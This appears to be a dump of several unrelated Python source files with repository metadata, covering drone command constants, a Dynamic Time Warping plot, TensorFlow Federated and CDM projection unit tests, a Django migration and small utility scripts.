assert len(data) == MSG_LEN - len(CMD_PREFIX)
return CMD_PREFIX + data
def checksum(msg: bytes) -> bytes:
msg = msg[: MSG_LEN - 2]
b9 = reduce(operator.xor, msg, 0xb9) & 0xFF
b10 = reduce(operator.add, msg, b9) & 0xFF
return bytes((b9, b10))
class SymaMSGs:
INIT = b"\x00"
IDLE = _c("808080802020202000550f")
POWER_TOGGLE = _c("808080802020202010652f")
LAND = _c("8080808020202020085d1f")
LIFT = _c("808080802020206000958f")
CALIBRATE = _c("808080802020202020754f")
| 2.828125 | 3 |
examples/metrics/plot_dtw.py | jmrichardson/pyts | 0 | 12759629 | <gh_stars>0
"""
====================
Dynamic Time Warping
====================
This example shows how to compute and visualize the optimal path
when computing Dynamic Time Warping (DTW) between two time series and
compare the results with different variants of DTW. It is implemented
as :func:`pyts.metrics.dtw`.
"""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
import matplotlib.pyplot as plt
from pyts.datasets import load_gunpoint
from pyts.metrics import dtw, itakura_parallelogram, sakoe_chiba_band
from pyts.metrics.dtw import (cost_matrix, accumulated_cost_matrix,
_return_path, _blurred_path_region)
# Parameters
X, _, _, _ = load_gunpoint(return_X_y=True)
x, y = X[0], X[1]
# To compare time series of different lengths, we remove some observations
mask = np.ones(x.size)
mask[::5] = 0
y = y[mask.astype(bool)]
n_timestamps_1, n_timestamps_2 = x.size, y.size
plt.figure(figsize=(10, 8))
timestamps_1 = np.arange(n_timestamps_1 + 1)
timestamps_2 = np.arange(n_timestamps_2 + 1)
# Dynamic Time Warping: classic
dtw_classic, path_classic = dtw(x, y, dist='square',
method='classic', return_path=True)
matrix_classic = np.zeros((n_timestamps_2 + 1, n_timestamps_1 + 1))
matrix_classic[tuple(path_classic)[::-1]] = 1.
plt.subplot(2, 2, 1)
plt.pcolor(timestamps_1, timestamps_2, matrix_classic,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('classic', dtw_classic),
fontsize=14)
# Dynamic Time Warping: sakoechiba
window_size = 0.1
dtw_sakoechiba, path_sakoechiba = dtw(
x, y, dist='square', method='sakoechiba',
options={'window_size': window_size}, return_path=True
)
band = sakoe_chiba_band(n_timestamps_1, n_timestamps_2,
window_size=window_size)
matrix_sakoechiba = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_sakoechiba[i, np.arange(*band[:, i])] = 0.5
matrix_sakoechiba[tuple(path_sakoechiba)] = 1.
plt.subplot(2, 2, 2)
plt.pcolor(timestamps_1, timestamps_2, matrix_sakoechiba.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('sakoechiba', dtw_sakoechiba),
fontsize=14)
# Dynamic Time Warping: itakura
slope = 1.2
dtw_itakura, path_itakura = dtw(
x, y, dist='square', method='itakura',
options={'max_slope': slope}, return_path=True
)
parallelogram = itakura_parallelogram(n_timestamps_1, n_timestamps_2,
max_slope=slope)
matrix_itakura = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_itakura[i, np.arange(*parallelogram[:, i])] = 0.5
matrix_itakura[tuple(path_itakura)] = 1.
plt.subplot(2, 2, 3)
plt.pcolor(timestamps_1, timestamps_2, matrix_itakura.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('itakura', dtw_itakura),
fontsize=14)
# Dynamic Time Warping: multiscale
resolution, radius = 5, 2
dtw_multiscale, path_multiscale = dtw(
x, y, dist='square', method='multiscale',
options={'resolution': resolution, 'radius': radius}, return_path=True
)
x_padded = x.reshape(-1, resolution).mean(axis=1)
y_padded = y.reshape(-1, resolution).mean(axis=1)
cost_mat_res = cost_matrix(x_padded, y_padded, dist='square', region=None)
acc_cost_mat_res = accumulated_cost_matrix(cost_mat_res)
path_res = _return_path(acc_cost_mat_res)
multiscale_region = _blurred_path_region(
n_timestamps_1, n_timestamps_2, resolution, x_padded.size, y_padded.size,
path_res,
radius=radius
)
matrix_multiscale = np.zeros((n_timestamps_1 + 1, n_timestamps_2 + 1))
for i in range(n_timestamps_1):
matrix_multiscale[i, np.arange(*multiscale_region[:, i])] = 0.5
matrix_multiscale[tuple(path_multiscale)] = 1.
plt.subplot(2, 2, 4)
plt.pcolor(timestamps_1, timestamps_2, matrix_multiscale.T,
edgecolors='k', cmap='Greys')
plt.xlabel('x', fontsize=12)
plt.ylabel('y', fontsize=12)
plt.title("{0}\nDTW(x, y) = {1:.2f}".format('multiscale', dtw_multiscale),
fontsize=14)
plt.suptitle("Dynamic Time Warping", y=0.995, fontsize=17)
plt.subplots_adjust(top=0.91, hspace=0.4)
plt.show()
| 2.703125 | 3 |
tensorflow_federated/python/core/templates/estimation_process_test.py | j35tor/federated | 1 | 12759630 | <filename>tensorflow_federated/python/core/templates/estimation_process_test.py
# Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.api import intrinsics
from tensorflow_federated.python.core.api import placements
from tensorflow_federated.python.core.api import test_case
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import estimation_process
@computations.tf_computation()
def test_initialize_fn():
return tf.constant(0, tf.int32)
@computations.tf_computation(tf.int32)
def test_next_fn(state):
return state
@computations.tf_computation(tf.int32)
def test_report_fn(state):
return tf.cast(state, tf.float32)
@computations.tf_computation(tf.float32)
def test_map_fn(estimate):
return tf.stack([estimate, estimate])
class EstimationProcessTest(test_case.TestCase):
def test_construction_does_not_raise(self):
try:
estimation_process.EstimationProcess(test_initialize_fn, test_next_fn,
test_report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct a valid EstimationProcess.')
def test_construction_with_empty_state_does_not_raise(self):
initialize_fn = computations.tf_computation()(lambda: ())
next_fn = computations.tf_computation(())(lambda x: (x, 1.0))
report_fn = computations.tf_computation(())(lambda x: x)
try:
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an EstimationProcess with empty state.')
def test_construction_with_unknown_dimension_does_not_raise(self):
initialize_fn = computations.tf_computation()(
lambda: tf.constant([], dtype=tf.string))
@computations.tf_computation(
computation_types.TensorType(shape=[None], dtype=tf.string))
def next_fn(strings):
return tf.concat([strings, tf.constant(['abc'])], axis=0)
@computations.tf_computation(
computation_types.TensorType(shape=[None], dtype=tf.string))
def report_fn(strings):
return strings
try:
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an EstimationProcess with parameter types '
'with statically unknown shape.')
def test_init_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=lambda: 0,
next_fn=test_next_fn,
report_fn=test_report_fn)
def test_next_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=test_initialize_fn,
next_fn=lambda state: state,
report_fn=test_report_fn)
def test_report_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
estimation_process.EstimationProcess(
initialize_fn=test_initialize_fn,
next_fn=test_next_fn,
report_fn=lambda state: state)
def test_init_param_not_empty_raises(self):
one_arg_initialize_fn = computations.tf_computation(tf.int32)(lambda x: x)
with self.assertRaises(errors.TemplateInitFnParamNotEmptyError):
estimation_process.EstimationProcess(one_arg_initialize_fn, test_next_fn,
test_report_fn)
def test_init_state_not_assignable(self):
float_initialize_fn = computations.tf_computation()(lambda: 0.0)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(float_initialize_fn, test_next_fn,
test_report_fn)
def test_federated_init_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_next_state_not_assignable(self):
float_next_fn = computations.tf_computation(
tf.float32)(lambda state: tf.cast(state, tf.float32))
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, float_next_fn,
test_report_fn)
def test_federated_next_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
intrinsics.federated_broadcast)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_next_state_not_assignable_tuple_result(self):
float_next_fn = computations.tf_computation(
tf.float32,
tf.float32)(lambda state, x: (tf.cast(state, tf.float32), x))
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, float_next_fn,
test_report_fn)
# Tests specific only for the EstimationProcess contract below.
def test_report_state_not_assignable(self):
report_fn = computations.tf_computation(
tf.float32)(lambda estimate: estimate)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(test_initialize_fn, test_next_fn,
report_fn)
def test_federated_report_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
estimation_process.EstimationProcess(initialize_fn, next_fn, report_fn)
def test_mapped_process_as_expected(self):
process = estimation_process.EstimationProcess(test_initialize_fn,
test_next_fn, test_report_fn)
mapped_process = process.map(test_map_fn)
self.assertIsInstance(mapped_process, estimation_process.EstimationProcess)
self.assertEqual(process.initialize, mapped_process.initialize)
self.assertEqual(process.next, mapped_process.next)
self.assertEqual(process.report.type_signature.parameter,
mapped_process.report.type_signature.parameter)
self.assertEqual(test_map_fn.type_signature.result,
mapped_process.report.type_signature.result)
def test_federated_mapped_process_as_expected(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
lambda state: intrinsics.federated_map(test_report_fn, state))
process = estimation_process.EstimationProcess(initialize_fn, next_fn,
report_fn)
map_fn = computations.federated_computation(
report_fn.type_signature.result)(
lambda estimate: intrinsics.federated_map(test_map_fn, estimate))
mapped_process = process.map(map_fn)
self.assertIsInstance(mapped_process, estimation_process.EstimationProcess)
self.assertEqual(process.initialize, mapped_process.initialize)
self.assertEqual(process.next, mapped_process.next)
self.assertEqual(process.report.type_signature.parameter,
mapped_process.report.type_signature.parameter)
self.assertEqual(map_fn.type_signature.result,
mapped_process.report.type_signature.result)
def test_map_estimate_not_assignable(self):
map_fn = computations.tf_computation(tf.int32)(lambda estimate: estimate)
process = estimation_process.EstimationProcess(test_initialize_fn,
test_next_fn, test_report_fn)
with self.assertRaises(estimation_process.EstimateNotAssignableError):
process.map(map_fn)
def test_federated_map_estimate_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(lambda state: state)
report_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
lambda state: intrinsics.federated_map(test_report_fn, state))
process = estimation_process.EstimationProcess(initialize_fn, next_fn,
report_fn)
map_fn = computations.federated_computation(
computation_types.FederatedType(
tf.int32, placements.CLIENTS))(lambda estimate: estimate)
with self.assertRaises(estimation_process.EstimateNotAssignableError):
process.map(map_fn)
if __name__ == '__main__':
test_case.main()
| 1.75 | 2 |
fixture/main.py | Cpt-Meow/PAT | 0 | 12759631 | <reponame>Cpt-Meow/PAT
class MainClass:
class_number = 20
class_string = 'Hello, world'
def get_local_number(self):
return 14
def get_lass_number(self):
return MainClass.class_number
def get_class_string(self):
return MainClass.class_string
| 2.171875 | 2 |
bin/uresnet.py | NuTufts/uresnet_pytorch | 3 | 12759632 | <filename>bin/uresnet.py
#!/usr/bin/python
import os
import sys
URESNET_DIR = os.path.dirname(os.path.abspath(__file__))
URESNET_DIR = os.path.dirname(URESNET_DIR)
sys.path.insert(0, URESNET_DIR)
from uresnet.flags import URESNET_FLAGS
def main():
flags = URESNET_FLAGS()
flags.parse_args()
if __name__ == '__main__':
main()
| 2.234375 | 2 |
src/news_posts/migrations/0001_initial.py | Zencrazycat/news_board | 0 | 12759633 | <filename>src/news_posts/migrations/0001_initial.py
# Generated by Django 2.2.10 on 2020-05-29 06:33
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=128)),
('link', models.URLField(max_length=256)),
('creation_date', models.DateField(default=django.utils.timezone.now)),
('upvotes', models.IntegerField(default=0)),
('author', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=128)),
('content', models.TextField()),
('creation_date', models.DateField(default=django.utils.timezone.now)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='news_posts.Post')),
],
),
]
| 1.804688 | 2 |
server/workers/services/src/apis/utils.py | dasch124/Headstart | 1 | 12759634 | import json
import time
def get_key(store, key):
while True:
res = store.get(key+"_output")
if res is None:
time.sleep(0.5)
else:
result = json.loads(res.decode('utf-8'))
store.delete(key)
store.delete(key+"_output")
break
return result
| 2.78125 | 3 |
objectModel/Python/tests/cdm/projection/test_projection_object_model.py | jocubeit/CDM | 265 | 12759635 | <filename>objectModel/Python/tests/cdm/projection/test_projection_object_model.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.enums import CdmObjectType
from cdm.enums.cdm_operation_type import CdmOperationType
from cdm.objectmodel import CdmCorpusDefinition, CdmFolderDefinition, CdmProjection, CdmOperationAddCountAttribute, \
CdmOperationAddSupportingAttribute, CdmOperationAddTypeAttribute, CdmOperationExcludeAttributes, CdmOperationArrayExpansion, \
CdmOperationCombineAttributes, CdmOperationRenameAttributes, CdmOperationReplaceAsForeignKey, CdmOperationIncludeAttributes, CdmObject
from cdm.storage import LocalAdapter
from tests.common import async_test, TestHelper
from tests.utilities.projection_test_utils import ProjectionTestUtils
class ProjectionObjectModelTest(unittest.TestCase):
foundation_json_path = 'cdm:/foundations.cdm.json'
# The path between TestDataPath and TestName.
tests_subpath = os.path.join('Cdm', 'Projection')
@async_test
async def test_projection_using_object_model(self):
"""Basic test to save projection based entities and then try to reload them and validate that the projections were persisted correctly"""
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, 'test_projection_using_object_model')
corpus.storage.mount('local', LocalAdapter(TestHelper.get_actual_output_folder_path(self.tests_subpath, 'test_projection_using_object_model')))
local_root = corpus.storage.fetch_root_folder('local')
manifest_default = self._create_default_manifest(corpus, local_root)
entity_test_source = self._create_entity_test_source(corpus, manifest_default, local_root)
entity_test_entity_projection = self._create_entity_test_entity_projection(corpus, manifest_default, local_root)
entity_test_entity_nested_projection = self._create_entity_test_entity_nested_projection(corpus, manifest_default, local_root)
entity_test_entity_attribute_projection = self._create_entity_test_entity_attribute_projection(corpus, manifest_default, local_root)
entity_test_operation_collection = self._create_entity_test_operation_collection(corpus, manifest_default, local_root)
# Save manifest and entities
await manifest_default.save_as_async('{}.manifest.cdm.json'.format(manifest_default.manifest_name), True)
expected = 'TestSource'
expected_type = CdmObjectType.PROJECTION_DEF
actual = None
actual_type = CdmObjectType.ERROR
# Try to read back the newly persisted manifest and projection based entities
manifest_read_back = await corpus.fetch_object_async('local:/{}.manifest.cdm.json'.format(manifest_default.manifest_name))
self.assertEqual(5, len(manifest_read_back.entities))
self.assertEqual(entity_test_source.entity_name, manifest_read_back.entities[0].entity_name)
self.assertEqual(entity_test_entity_projection.entity_name, manifest_read_back.entities[1].entity_name)
self.assertEqual(entity_test_entity_nested_projection.entity_name, manifest_read_back.entities[2].entity_name)
self.assertEqual(entity_test_entity_attribute_projection.entity_name, manifest_read_back.entities[3].entity_name)
# Read back the newly persisted manifest and projection based entity TestEntityProjection and validate
entity_test_entity_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_projection.entity_name, entity_test_entity_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_projection_read_back)
actual = entity_test_entity_projection_read_back.extends_entity.explicit_reference.source.named_reference
actual_type = entity_test_entity_projection_read_back.extends_entity.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back the newly persisted manifest and projection based entity TestEntityNestedProjection and validate
entity_test_entity_nested_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_nested_projection.entity_name, entity_test_entity_nested_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_nested_projection_read_back)
actual = entity_test_entity_nested_projection_read_back.extends_entity.explicit_reference.source.explicit_reference.source.explicit_reference.source.named_reference
actual_type = entity_test_entity_nested_projection_read_back.extends_entity.explicit_reference.source.explicit_reference.source.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back the newly persisted manifest and projection based entity TestEntityAttributeProjection and validate
entity_test_entity_attribute_projection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_entity_attribute_projection.entity_name, entity_test_entity_attribute_projection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_entity_attribute_projection_read_back)
actual = entity_test_entity_attribute_projection_read_back.attributes[0].entity.explicit_reference.source.named_reference
actual_type = entity_test_entity_attribute_projection_read_back.attributes[0].entity.explicit_reference.object_type
self.assertEqual(expected, actual)
self.assertEqual(expected_type, actual_type)
# Read back operations collections and validate
entity_test_operation_collection_read_back = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_test_operation_collection.entity_name, entity_test_operation_collection.entity_name), manifest_read_back)
self.assertIsNotNone(entity_test_operation_collection_read_back)
actual_operation_count = len(entity_test_operation_collection_read_back.extends_entity.explicit_reference.operations)
self.assertEqual(9, actual_operation_count)
operations = entity_test_operation_collection_read_back.extends_entity.explicit_reference.operations
self.assertEqual(CdmOperationType.ADD_COUNT_ATTRIBUTE, operations[0].type)
self.assertEqual(CdmOperationType.ADD_SUPPORTING_ATTRIBUTE, operations[1].type)
self.assertEqual(CdmOperationType.ADD_TYPE_ATTRIBUTE, operations[2].type)
self.assertEqual(CdmOperationType.EXCLUDE_ATTRIBUTES, operations[3].type)
self.assertEqual(CdmOperationType.ARRAY_EXPANSION, operations[4].type)
self.assertEqual(CdmOperationType.COMBINE_ATTRIBUTES, operations[5].type)
self.assertEqual(CdmOperationType.RENAME_ATTRIBUTES, operations[6].type)
self.assertEqual(CdmOperationType.REPLACE_AS_FOREIGN_KEY, operations[7].type)
self.assertEqual(CdmOperationType.INCLUDE_ATTRIBUTES, operations[8].type)
def _create_default_manifest(self, corpus: 'CdmCorpusDefinition', local_root: 'CdmFolderDefinition') -> 'CdmManifestDefinition':
"""Create a default manifest"""
manifest_name = 'default'
manifest_doc_name = '{}.manifest.cdm.json'.format(manifest_name)
manifest_default = corpus.make_object(CdmObjectType.MANIFEST_DEF, manifest_name)
local_root.documents.append(manifest_default, manifest_doc_name)
return manifest_default
def _create_entity_test_source(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create a simple entity called 'TestSource' with a single attribute"""
entity_name = 'TestSource'
entity_test_source = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
attribute_name = 'TestAttribute'
entity_test_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, attribute_name, False)
entity_test_attribute.data_type = corpus.make_ref(CdmObjectType.DATA_TYPE_REF, 'string', True)
entity_test_attribute.purpose = corpus.make_ref(CdmObjectType.PURPOSE_REF, 'hasA', True)
entity_test_attribute.display_name = attribute_name
entity_test_source.attributes.append(entity_test_attribute)
entity_test_source_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_source_doc.imports.append(self.foundation_json_path)
entity_test_source_doc.definitions.append(entity_test_source)
local_root.documents.append(entity_test_source_doc, entity_test_source_doc.name)
manifest_default.entities.append(entity_test_source)
return entity_test_source
def _create_projection(self, corpus: 'CdmCorpusDefinition') -> 'CdmProjection':
"""Create a simple projection object"""
projection = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
return projection
def _create_nested_projection(self, corpus: 'CdmCorpusDefinition') -> 'CdmProjection':
"""Create a 3-level nested projection object"""
projection3 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection3.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
inline_projection_entity_ref3 = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref3.explicit_reference = projection3
projection2 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection2.source = inline_projection_entity_ref3
inline_projection_entity_ref2 = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref2.explicit_reference = projection2
projection1 = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection1.source = inline_projection_entity_ref2
return projection1
def _create_entity_test_entity_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityProjection' that extends from a projection"""
entity_name = 'TestEntityProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_projection(corpus)
entity_test_entity_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
entity_test_entity_projection.extends_entity = inline_projection_entity_ref
entity_test_entity_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_projection_doc.definitions.append(entity_test_entity_projection)
local_root.documents.append(entity_test_entity_projection_doc, entity_test_entity_projection_doc.name)
manifest_default.entities.append(entity_test_entity_projection)
return entity_test_entity_projection
def _create_entity_test_entity_nested_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityNestedProjection' that extends from a projection"""
entity_name = 'TestEntityNestedProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_nested_projection(corpus)
entity_test_entity_nested_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
entity_test_entity_nested_projection.extends_entity = inline_projection_entity_ref
entity_test_entity_nested_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_nested_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_nested_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_nested_projection_doc.definitions.append(entity_test_entity_nested_projection)
local_root.documents.append(entity_test_entity_nested_projection_doc, entity_test_entity_nested_projection_doc.name)
manifest_default.entities.append(entity_test_entity_nested_projection)
return entity_test_entity_nested_projection
def _create_entity_test_entity_attribute_projection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition') -> 'CdmEntityDefinition':
"""Create an entity 'TestEntityAttributeProjection' that contains an entity attribute with a projection as a source entity"""
entity_name = 'TestEntityAttributeProjection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
inline_projection_entity_ref.explicit_reference = self._create_projection(corpus)
entity_test_entity_attribute_projection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
attribute_name = 'TestAttribute'
entity_test_entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, attribute_name, False)
entity_test_entity_attribute.entity = inline_projection_entity_ref
entity_test_entity_attribute_projection.attributes.append(entity_test_entity_attribute)
entity_test_entity_attribute_projection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_entity_attribute_projection_doc.imports.append(self.foundation_json_path)
entity_test_entity_attribute_projection_doc.imports.append('TestSource.cdm.json')
entity_test_entity_attribute_projection_doc.definitions.append(entity_test_entity_attribute_projection)
local_root.documents.append(entity_test_entity_attribute_projection_doc, entity_test_entity_attribute_projection_doc.name)
manifest_default.entities.append(entity_test_entity_attribute_projection)
return entity_test_entity_attribute_projection
def _create_projection_with_operation_collection(self, corpus: 'CdmCorpusDefinition', owner: 'CdmObject') -> 'CdmProjection':
"""Create a projection object with operations"""
projection = corpus.make_object(CdmObjectType.PROJECTION_DEF)
projection.source = corpus.make_object(CdmObjectType.ENTITY_REF, 'TestSource', True)
# AddCountAttribute Operation
add_count_attribute_op = CdmOperationAddCountAttribute(corpus.ctx)
add_count_attribute_op.count_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'countAtt')
projection.operations.append(add_count_attribute_op)
# AddSupportingAttribute Operation
add_supporting_attribute_op = CdmOperationAddSupportingAttribute(corpus.ctx)
add_supporting_attribute_op.supporting_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'supportingAtt')
projection.operations.append(add_supporting_attribute_op)
# AddTypeAttribute Operation
add_type_attribute_op = CdmOperationAddTypeAttribute(corpus.ctx)
add_type_attribute_op.type_attribute = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'typeAtt')
projection.operations.append(add_type_attribute_op)
# ExcludeAttributes Operation
exclude_attributes_op = CdmOperationExcludeAttributes(corpus.ctx)
exclude_attributes_op.exclude_attributes = []
exclude_attributes_op.exclude_attributes.append('testAttribute1')
projection.operations.append(exclude_attributes_op)
# ArrayExpansion Operation
array_expansion_op = CdmOperationArrayExpansion(corpus.ctx)
array_expansion_op.start_ordinal = 0
array_expansion_op.end_ordinal = 1
projection.operations.append(array_expansion_op)
# CombineAttributes Operation
combine_attributes_op = CdmOperationCombineAttributes(corpus.ctx)
combine_attributes_op.select = []
combine_attributes_op.merge_into = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'combineAtt')
combine_attributes_op.select.append('testAttribute1')
projection.operations.append(combine_attributes_op)
# RenameAttributes Operation
rename_attributes_op = CdmOperationRenameAttributes(corpus.ctx)
rename_attributes_op.rename_format = '{m}'
projection.operations.append(rename_attributes_op)
# ReplaceAsForeignKey Operation
replace_as_foreign_key_op = CdmOperationReplaceAsForeignKey(corpus.ctx)
replace_as_foreign_key_op.reference = 'testAttribute1'
replace_as_foreign_key_op.replace_with = corpus.make_object(CdmObjectType.TYPE_ATTRIBUTE_DEF, 'testForeignKey', False)
projection.operations.append(replace_as_foreign_key_op)
# IncludeAttributes Operation
include_attributes_op = CdmOperationIncludeAttributes(corpus.ctx)
include_attributes_op.include_attributes = []
include_attributes_op.include_attributes.append('testAttribute1')
projection.operations.append(include_attributes_op)
return projection
def _create_entity_test_operation_collection(self, corpus: 'CdmCorpusDefinition', manifest_default: 'CdmManifestDefinition', local_root: 'CdmFolderDefinition'):
"""Create an entity 'TestOperationCollection' that extends from a projection with a collection of operations"""
entity_name = 'TestOperationCollection'
inline_projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None)
entity_test_operation_collection = corpus.make_object(CdmObjectType.ENTITY_DEF, entity_name)
inline_projection_entity_ref.explicit_reference = self._create_projection_with_operation_collection(corpus, entity_test_operation_collection)
entity_test_operation_collection.extends_entity = inline_projection_entity_ref
entity_test_operation_collection_doc = corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity_name), False)
entity_test_operation_collection_doc.imports.append(self.foundation_json_path)
entity_test_operation_collection_doc.imports.append('TestSource.cdm.json')
entity_test_operation_collection_doc.definitions.append(entity_test_operation_collection)
local_root.documents.append(entity_test_operation_collection_doc, entity_test_operation_collection_doc.name)
manifest_default.entities.append(entity_test_operation_collection)
return entity_test_operation_collection
| 2.15625 | 2 |
